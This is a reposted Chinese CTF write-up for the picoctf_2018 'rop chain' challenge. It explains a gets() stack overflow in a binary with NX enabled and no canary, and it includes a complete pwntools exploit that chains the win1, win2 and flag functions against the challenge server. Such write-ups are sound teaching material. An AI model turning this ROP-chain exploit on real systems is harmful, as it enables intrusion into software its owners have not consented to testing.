[BUUCTF-pwn]——picoctf_2018_rop chain
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——picoctf_2018_rop chain
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——picoctf_2018_rop chain
- 題目地址: https://buuoj.cn/challenges#picoctf_2018_rop%20chain
checksec看看,開啟了NX,但是沒有canary
IDA中查看一下
發現gets函數,可以棧溢出
發現flag,不過需要滿足條件,才可以獲得
接著找可能用到的函數
接著找到對應函數的地址
思路
利用棧溢出,構造rop鏈,首先將win1 = 1, 然后 win2 = 1,最后獲得flag
exploit
from pwn import * p = remote("node3.buuoj.cn",25806) win_function1 = 0x080485CB win_function2 = 0x080485D8 flag = 0x0804862B vuln = 0x08048714 payload = 'a' * (0x18 + 4) + p32(win_function1) + p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD) p.sendlineafter("Enter your input> ", payload) p.interactive()想要知道0xBAAAAAAD 和 0xDEADBAAD怎么來的,可以
點擊我查看
https://blog.csdn.net/Y_peak/article/details/114004550
總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——picoctf_2018_rop chain的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: int类型在计算机中的储存(原码、补码、
- 下一篇: [攻防世界 pwn]——反应釜开关控制